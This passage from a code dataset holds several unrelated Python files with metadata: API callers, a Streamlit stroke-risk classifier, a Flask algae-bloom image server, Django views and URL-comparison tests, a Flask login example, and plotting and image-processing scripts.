LoggedDetailsAPIException()\r\n\r\n\r\nclass EventDetailsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets details (ID and title) of an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_EVENT.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\traw_details = json_data['data'][0]\r\n\t\tdetails = {\r\n\t\t\t'id': raw_details['id'],\r\n\t\t\t'title': raw_details['title'],\r\n\t\t}\r\n\t\treturn details\r\n\r\n\t\t\r\nclass EventParticipantsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets list of participants to an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_PARTICIPANTS.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\treturn [item['subscriber']['first_name'] for item in json_data['data']]\r\n", "sub_path": "apiproxy/events/api_action_caller.py", "file_name": "api_action_caller.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_BASE_URL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 31, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 46, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 52, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 58, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 68, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 76, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT.format", "line_number": 83, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 83, "usage_type": "name"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS.format", "line_number": 98, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "290191003", "text": "#from fastapi import FastAPI\r\n#from pydantic import BaseModel\r\nimport pickle\r\nimport streamlit as st\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n'''\r\napp=FastAPI()\r\nclass request_body(BaseModel):\r\n Age:float\r\n Hypertension:str\r\n Heart_disease:str\r\n Average_glucose: float\r\n BMI: float\r\n Marital_status: str\r\n Gender: str\r\n Work_type: str\r\n Residence:str\r\n Smoking_status: str\r\n'''\r\ndf=pd.read_csv(\"stroke_data_Cleaned3.csv\",header=0)\r\nprint(df.head())\r\n\r\n#Creating X and y Variables for Training Testing datasets\r\nX=df.drop([\"stroke\"],axis=1)\r\ny=df[\"stroke\"] #Target Variable\r\n\r\n#Creating Training Testing datasets\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test= train_test_split(X,y, test_size=0.2, random_state=5)\r\n#I have tried using K-best(taking 6 Variables) and the Classification Report doesnot show much Variation thus we are not using K-best\r\n\r\n#Creating Classification 
Models\r\n#I am using Naive Bayes Classification here, thus scaling and one-hot encoding are not required\r\nmodel=GaussianNB()\r\nmodel.fit(X_train,y_train)\r\ny_pred=model.predict(X_test)\r\n\r\n#Testing efficiency of Naive Bayes Classifier\r\nfrom sklearn.metrics import confusion_matrix, classification_report,recall_score,f1_score\r\ncm=confusion_matrix(y_test, y_pred)\r\nprint(\"Confusion Matrix\")\r\nprint(cm)\r\ncr=classification_report(y_test, y_pred)\r\nprint(\"Classification Report\")\r\nprint(cr)\r\n#Since this dataset is not balanced, accuracy is not the measure we will be looking for\r\n# Here we want to reduce the number of False negatives so we will look at Recall and F1 Score\r\nrs=recall_score(y_test,y_pred, average=\"weighted\")\r\nfs=f1_score(y_test,y_pred,average=\"weighted\")\r\nprint(\"Recall Value: \",rs)\r\nprint(\"F1 Score: \",fs)\r\n\r\n#Pickle is used for saving the .pkl file\r\n#We are using .pkl file because we are going to deploy the model on Streamlit\r\npickle.dump(model,open('stroke.pkl','wb'))\r\nloaded_model=pickle.load(open('stroke.pkl','rb'))\r\n\r\n#For deploying on the Website\r\ndef predict_input_page():\r\n loaded_model = pickle.load(open('stroke.pkl', 'rb'))\r\n st.title(\"Stroke Prediction Model\")\r\n Age=st.slider(\"Age: \", min_value=0, max_value=90)\r\n Hypertension = st.radio(\"Do you suffer from Hypertension: \",(\"Yes\",\"No\"))\r\n Heart_disease=st.radio(\"Do you suffer from Heart Disease: \",(\"Yes\",\"No\"))\r\n Average_glucose=st.slider(\"Average Glucose Levels: \", min_value=50, max_value=280)\r\n BMI=st.slider(\"BMI: \",min_value=10, max_value=70)\r\n Marrital_status=st.radio(\"Are you married: \",(\"Yes\",\"No\"))\r\n Gender=st.radio(\"What is your Gender: \",(\"Male\",\"Female\"))\r\n Work_type=st.radio(\"What is your Work type?\",(\"Private\",\"Self-employed\",\"children\",\"Govt_job\",\"Never_worked\"))\r\n Residence=st.radio(\"What is your area of Residence\",(\"Urban\",\"Rural\"))\r\n Smoking_status=st.radio(\"Enter your Smoking Status:\",(\"never smoked\",\"Unknown\",\"formerly smoked\",\"smokes\"))\r\n ok=st.button(\"Predict\")\r\n\r\n #Since we are taking the input as a string and the model needs the values in numbers we convert the string to int\r\n if Hypertension==\"Yes\":\r\n Hypertension= 1\r\n elif Hypertension==\"No\":\r\n Hypertension=0\r\n\r\n if Heart_disease==\"Yes\":\r\n Heart_disease= 1\r\n elif Heart_disease==\"No\":\r\n Heart_disease=0\r\n\r\n if Marrital_status==\"Yes\":\r\n Marrital_status=1\r\n elif Marrital_status==\"No\":\r\n Marrital_status=0\r\n\r\n if Gender==\"Male\":\r\n Gender=1\r\n elif Gender==\"Female\":\r\n Gender=0\r\n\r\n if Work_type==\"Govt_job\":\r\n Work_type=0\r\n elif Work_type==\"Never_worked\":\r\n Work_type=1\r\n elif Work_type==\"Private\":\r\n Work_type=2\r\n elif Work_type==\"Self-employed\":\r\n Work_type=3\r\n elif Work_type==\"children\":\r\n Work_type=4\r\n\r\n if Residence==\"Rural\":\r\n Residence=0\r\n elif Residence==\"Urban\":\r\n Residence=1\r\n\r\n if Smoking_status==\"Unknown\":\r\n Smoking_status=0\r\n elif Smoking_status==\"formerly smoked\":\r\n Smoking_status=1\r\n elif Smoking_status==\"never smoked\":\r\n Smoking_status=2\r\n elif Smoking_status==\"smokes\":\r\n Smoking_status=3\r\n\r\n testdata=np.array([[Age, Hypertension, Heart_disease, Average_glucose, BMI, Marrital_status,Gender,Work_type,Residence,Smoking_status]])\r\n classi=loaded_model.predict(testdata)[0]\r\n\r\n try:\r\n if ok==True:\r\n if classi == 0:\r\n st.success(\"Awesome! 
You are at low risk of getting Stroke\")\r\n elif classi == 1:\r\n st.error(\"Caution! You are at high risk of getting Stroke\")\r\n except:\r\n st.info(\"Enter some Data\")\r\n\r\n\r\n\r\n\r\n", "sub_path": "ML_Project_2_209027.py", "file_name": "ML_Project_2_209027.py", "file_ext": "py", "file_size_in_byte": 4696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 133, "usage_type": "call"}]}
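The comments in ML_Project_2_209027.py above reason that accuracy is the wrong headline metric for an imbalanced stroke dataset and that recall and F1 matter more. A minimal synthetic illustration of that point; the labels below are made up, not taken from the record, and the zero_division argument assumes scikit-learn 0.22 or newer:

import numpy as np
from sklearn.metrics import accuracy_score, recall_score, f1_score

# Heavily imbalanced ground truth: 95 negatives, 5 positives.
y_true = np.array([0] * 95 + [1] * 5)
# A degenerate "classifier" that always predicts the majority class.
y_pred = np.zeros(100, dtype=int)

print(accuracy_score(y_true, y_pred))                 # 0.95, deceptively good
print(recall_score(y_true, y_pred, zero_division=0))  # 0.0, every positive case is missed
print(f1_score(y_true, y_pred, zero_division=0))      # 0.0

+{"seq_id": "59612291", "text": "import flask\nimport os\nimport datetime\nimport sys\n\nimport tensorflow as tf\nfrom flask import json\nfrom keras import models\n\n# initialize our Flask application and the Keras model\nfrom safetoswim.core import PhotoProcessor\nfrom safetoswim.repository import PostgresRepository, SqliteRepository\n\napplication = flask.Flask(__name__)\nmodel = None\ngraph = tf.get_default_graph()\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nUPLOAD_FOLDER = 'images'\napplication.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef load_model():\n global model\n file_dir = os.path.abspath(os.path.dirname(__file__))\n #model = ResNet50(weights=\"imagenet\")\n model_path = os.path.join(file_dir, 'models', 'hab_KerasBinaryClassifier_model.h5')\n print(f'Loading model from: {model_path}')\n model = models.load_model(model_path)\n if model is None:\n raise TypeError(f'Failed to load model from file {model_path}')\n\ndef get_model():\n global model\n if model is None:\n load_model()\n return model\n\n\ndef allowed_file(filename):\n return '.' 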
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef save_image(submitter, image_location, date, time, name='', location='', latitude=0.0, longitude=0.0):\n repo = SqliteRepository('test.sqlite')\n id = repo.add_sample(submitter, image_location, date, time, name, location, latitude, longitude)\n return id\n\n@application.route(\"/\", methods=['GET'])\ndef index():\n return '''\n <title>Safe To Swim</title>\n <h1>Welcome to SafeToSwim!</h1>\n
    '''\n\n@application.route(\"/predict\", methods=['GET', 'POST'])\ndef predict():\n # initialize the data dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL format\n image = flask.request.files[\"image\"].read()\n photo_processor = PhotoProcessor(image)\n location = 'OakLedge'\n submitter = 'admin@safetoswim.org'\n longitude = 0.0\n # photo_processor.exif['DateTime']\n # photo_processor.exif['DateTimeOriginal']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n if 'DateTime' in photo_processor.exif_data:\n date = datetime.datetime.strptime(photo_processor.exif_data['DateTime'], '%Y:%m:%d %H:%M:%S')\n else:\n date = datetime.datetime.now()\n time = date.time()\n date = date.date()\n #date, time, name='', location='', latitude=0.0, longitude=0.0\n save_image(submitter, 'images/one.jpg', str(date), str(time), 'New Sample', location,\n photo_processor.latitude, photo_processor.longitude)\n\n # preprocess the image and prepare it for classification\n rgb_data = photo_processor.prepare_rgb_data(img_size=(128, 128))\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n # classify the input image and then initialize the list\n # of predictions to return to the client\n preds = None\n model = get_model()\n with graph.as_default():\n preds = model.predict(rgb_data)\n if preds[0][0] >= 0.5:\n data[\"prediction\"] = 'bloom'\n else:\n data[\"prediction\"] = 'not-bloom'\n\n #data['exif'] = photo_processor.exif\n\n # loop over the results and add them to the list of\n # returned predictions\n '''\n for (imagenetID, label, prob) in results[0]:\n r = {\"label\": label, \"probability\": float(prob)}\n data[\"predictions\"].append(r)\n '''\n\n # indicate that the request was a success\n data[\"success\"] = True\n\n # return the data dictionary as a JSON response\n response = flask.jsonify(data)\n return response\n else:\n pass\n else:\n return '''\n \n Upload new File\n

    Upload new File

    \n
    \n

    \n \n

    \n

    %s

    \n ''' % \"
    \".join(os.listdir(application.config['UPLOAD_FOLDER'], ))\n\n\nif __name__ == \"__main__\":\n print((\"* Loading Keras model and Flask starting server...\"\n \"please wait until server has fully started\"))\n load_model()\n application.run(host=\"0.0.0.0\", debug=True)\n\n", "sub_path": "safetoswim/servers/flask_server.py", "file_name": "flask_server.py", "file_ext": "py", "file_size_in_byte": 4954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 28, "usage_type": "name"}, {"api_name": "safetoswim.repository.SqliteRepository", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request.files.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "safetoswim.core.PhotoProcessor", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "415168496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import View, TemplateView, CreateView, UpdateView, FormView, ListView\nfrom django.views import generic\nfrom django.conf import settings \nfrom django.shortcuts import render\n\n# Create your views here.\n\nclass Sell_In_OutView(TemplateView):\n template_name = 'sell-inXsell-out.html'\nsell = Sell_In_OutView.as_view() \n\n\nclass VendasDiariasView(TemplateView):\n template_name = 'vendas_diarias.html'\nvendas_diarias = VendasDiariasView.as_view() \n\n\nclass NielsenView(TemplateView):\n template_name = 'nielsen.html'\nnielsen = NielsenView.as_view()\n\n\nclass CloseUpView(TemplateView):\n template_name = 'close-up.html'\ncloseup = CloseUpView.as_view()", "sub_path": "PowerBiNestle/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 25, "usage_type": "name"}]} +{"seq_id": 
"132611014", "text": "from flask import Flask\nfrom flask import render_template, request, session, url_for, redirect\n\napp = Flask(__name__)\napp.secret_key = 'whoknowsthissecretw'\n\n@app.route('/')\ndef index():\n return render_template('index2.html')\n \n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.form['user']\n session['user'] = user\n return render_template('welcome.html', user_name=user)\n\n@app.route('/logout')\ndef logout():\n del session['user']\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "FlaskEx1/src/ex2_v1.py", "file_name": "ex2_v1.py", "file_ext": "py", "file_size_in_byte": 631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "420167610", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom csv import reader\r\n\r\nx = []\r\ny = []\r\nvalues = []\r\nmax_values = []\r\n\r\n# HÄMTA DATA\r\nwith open('rawdata119870.csv', 'r') as csvfile:\r\n data = list(reader(csvfile))\r\n\r\nfor row in data:\r\n values.append({'x': float(row[0]), 'y': float(row[2])})\r\n\r\n# RÄKNA UT MEDLET\r\nindex = 0\r\nlenSample = 27\r\n\r\nwhile index < len(values):\r\n n = 0\r\n xv = 0 \r\n yv = 0\r\n try:\r\n while n < lenSample:\r\n yv += values[index]['y']\r\n xv += values[index]['x']\r\n n += 1\r\n index += 1\r\n\r\n x.append(xv/lenSample)\r\n y.append(yv/lenSample)\r\n except IndexError:\r\n pass\r\n\r\nplt.plot(x, y)\r\nplt.title('graph')\r\nplt.show()", "sub_path": "AI/data analys/uppgift/2c.py", "file_name": "2c.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "270521174", "text": "import threading\nfrom . 
import Paragraph\nfrom PIL import Image, ImageDraw, ImageEnhance\n\n#process for the thread that creates the first layer\nclass baseThread (threading.Thread):\n def __init__(self, threadID, lock, image, outputFile):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.image = image\n self.lock = lock\n self.outputFile = outputFile\n\n def run(self):\n #print(\"Starting \" + self.name)\n # Get lock to synchronize threads\n self.lock.acquire()\n\n pixels = self.image.load()\n\n for x in range(self.image.size[0]):\n for y in range(self.image.size[1]):\n avg = ( pixels[x,y][0] + pixels[x,y][1] + pixels[x,y][2] )//3\n pixels[x,y] = (avg,avg,avg,255)\n\n\n enhancer = ImageEnhance.Contrast(self.image)\n enhancer.enhance(1.8).save(self.outputFile)\n\n # Free lock to release next thread\n self.lock.release()", "sub_path": "dataportrait/portraitimage/lib/baseLayer.py", "file_name": "baseLayer.py", "file_ext": "py", "file_size_in_byte": 964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 6, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PIL.ImageEnhance.Contrast", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 27, "usage_type": "name"}]}
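baseLayer.py above grayscales the image with a per-pixel Python loop. A hedged alternative sketch, not from the original project: PIL can do the conversion in C via convert('L'), though that uses ITU-R 601-2 luma weights rather than the plain channel average used above, so pixel values differ slightly (make_base_layer is an illustrative name):

from PIL import ImageEnhance

def make_base_layer(image, output_file, contrast=1.8):
    # Weighted grayscale computed in C instead of a per-pixel Python loop,
    # then converted back to RGBA so downstream layers still see 4 channels.
    gray = image.convert('L').convert('RGBA')
    ImageEnhance.Contrast(gray).enhance(contrast).save(output_file)

+{"seq_id": "212088095", "text": "\"\"\"\nTesting UrlComparator\n\nThere are few comments for each testcase because the name\nof each testcase is very descriptive\n\"\"\"\n\nfrom django.test import TestCase\nfrom sectionproject.urlutils.urlcomparator.urlcomparator import UrlComparator\n\nclass ComparatorTest(TestCase):\n # input: wiki example in writeup\n # expected: equal\n def test_wikiExample(self):\n urlA = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n urlB = 'http://en.wikipedia.org/wiki/Unit_testing#Language-'\n \n expected = 0\n res = UrlComparator.compareNormalizeUrl(urlA, urlB)\n \n self.assertEqual(expected, res, 'expected: ' + str(expected) +\\\n ', actual: ' + str(res))\n \n # input: two different url\n # expected: one larger than the other, vice versa for opposite direction \n def test_normalGreaterLesser(self):\n urlA = 'www.google.com'\n urlB = 'www.nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n self.assertTrue(UrlComparator.compareNormalizeUrl(urlB, urlA) > 0)\n \n # input: one url with www., one without\n # expected: correct behavior\n def test_normalizedWWWDotDifferentUrl(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # inputs: url with same query in different order\n # expected: equal\n def test_normalizedEqualDifferentQueryUrl(self):\n urlA = 'www.google.com/?q=cse403;id=1'\n urlB = 'www.google.com/?id=1&q=cse403'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) == 0)\n \n # input: url with capital letters in path\n # expected: capital letter should come before \n def test_caseSensitiveCases(self):\n urlA = 'www.google.com/Images'\n urlB = 'www.google.com/images'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # input: two urls\n # expected: order by alphabetical order\n def test_sourcecomparison(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n self.assertTrue(UrlComparator.compareSourceUrl(urlA, urlB) > 0)\n \n # input: a url and two 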
list where one has exactly the same url\n # expected: source unique for one and not source unique for the other\n def test_sourceUnique(self):\n url = 'www.google.com'\n list1 = ['google.com', 'http://google.com']\n list2 = ['www.google.com', 'something.net']\n \n self.assertTrue(UrlComparator.isSourceUnique(url, list1))\n self.assertFalse(UrlComparator.isSourceUnique(url, list2))\n \n # input: a url compared to 1) same url, 2) different but same norm url, 3) entirely\n # different url\n # expected: 1) False, 2) False, 3) True \n def test_normunique(self):\n url = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n # same url\n list1 = ['http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations']\n \n # norm same url\n list2 = ['http://en.wikipedia.org/wiki/Unit_testing#Language-']\n \n # different url\n list3 = ['wikipedia.org']\n \n self.assertFalse(UrlComparator.isNormalizeUnique(url, list1))\n self.assertFalse(UrlComparator.isNormalizeUnique(url, list2))\n self.assertTrue(UrlComparator.isNormalizeUnique(url, list3))\n \n \n \n \n \n \n \n \n ", "sub_path": "sectionproject/urlutils/urlcomparator/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 19, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 19, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 30, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 30, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 31, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 31, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 39, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 39, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 47, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 47, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 55, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 55, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareSourceUrl", "line_number": 62, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 62, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 71, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 71, "usage_type": "name"}, 
{"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 72, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 72, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 88, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 88, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 89, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 89, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 90, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "447564364", "text": "import cPickle as pickle\nfrom itertools import compress\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom sklearn.decomposition import PCA \nfrom sklearn.manifold import TSNE\n\n\ndef pca(states, labels, n_components, plot_by_colors=False):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('PCA')\n pca = PCA(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = pca.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n color_names = ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange']\n colors = np.choose(labels, color_names)\n if n_components == 2:\n\n if plot_by_colors:\n fig = plt.figure(1, (4., 4.))\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols=(3, 4), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n )\n\n for i in range(10):\n\n labels_one = np.array(labels)\n idxs = labels_one == i\n states_one = np.array(list(compress(transformed_states, idxs)))\n labels_one = [color_names[i] for _ in range(len(states_one))]\n grid[i].scatter(states_one[:, 0], states_one[:, 1], c=labels_one)\n\n # plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\ndef tsne(states, labels, n_components):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('T-SNE')\n tsne = TSNE(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = tsne.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n colors = np.choose(labels, 